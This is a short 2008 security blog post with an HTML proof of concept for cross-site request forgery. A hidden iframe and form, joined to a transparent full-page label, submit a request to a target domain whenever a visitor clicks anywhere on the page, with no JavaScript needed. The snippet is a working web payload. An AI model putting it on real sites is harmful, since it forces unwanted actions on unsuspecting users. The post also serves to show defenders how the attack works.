An interesting CSRF attack

Posted by: atom, 2008 09.02

I found this post very interesting for a number of reasons.  Mainly because the label / input relationship is behaviour driven by HTML, which shouldn’t really be happening.  After looking at this a bit, I made a variation (more focused on villainish sneakery) that will allow the transparent submission of a form to an iframe if the user clicks anywhere on the page, without the aid of JavaScript, just as in rvdh’s example.  Plenty of nastniess can ensue.

<iframe name="my_frame" src="" style="display:none"></iframe>
<form action="http://targetdomain.com" target="my_frame">
	<p>
		<label for="submit" style="position:fixed;top:0;right:0;bottom:0;left:0">&nbsp;</label>
		<input type="submit" id="submit" style="display:none"/>
	</p>
</form>

trackback

Tags: , , , , , , 1 response »
  1. Bypassing NoScript Iframe Protection. | Ecommy – your ecommerce support for your online business's gravatar
    Bypassing NoScript Iframe Protection. | Ecommy - your ecommerce support for your online business Says:
    October 5th, 2008 at 9:54 am

    [...] [3] http://www.0×000000.com/index.php?i=312 [4] http://trickeries.com/216/an-interesting-csrf-attack/ source: OWASP News Share and [...]

Leave a Reply

ok to use:

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong> <pre lang="" line="" escaped="">

bonus!

If you want to post code, you can use:

<pre lang="[language]">[code]</pre>

Where [language] is a valid geshi language type, and where [code] is your code.